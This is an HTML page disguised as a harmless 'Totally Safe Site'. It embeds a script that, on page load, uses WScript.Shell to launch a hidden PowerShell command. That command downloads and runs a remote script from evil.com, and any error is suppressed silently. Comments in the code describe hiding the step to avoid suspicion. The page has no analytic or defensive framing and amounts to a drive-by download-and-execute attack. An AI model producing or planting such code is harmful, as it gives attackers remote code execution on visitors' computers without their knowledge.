index.html

<!DOCTYPE html>
<html>
<head>
    <title>Legit-Looking Page</title>
</head>
<body>
    <h1>Welcome to Our Totally Safe Site!</h1>
    <!-- Hidden malicious script -->
    <script>
        // Obfuscated to avoid immediate suspicion
        (function() {
            // Create a hidden PowerShell command
            var cmd = 'powershell -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString(\'http://evil.com/payload.ps1\')"';
            // Use a subtle method to execute it (Windows-specific)
            try {
                var wsh = new ActiveXObject('WScript.Shell'); // Old but still works on some systems
                wsh.Run(cmd, 0, false); // 0 = hidden, false = don't wait
            } catch (e) {
                // Fallback or silent fail
            }
        })();
    </script>
</body>
</html>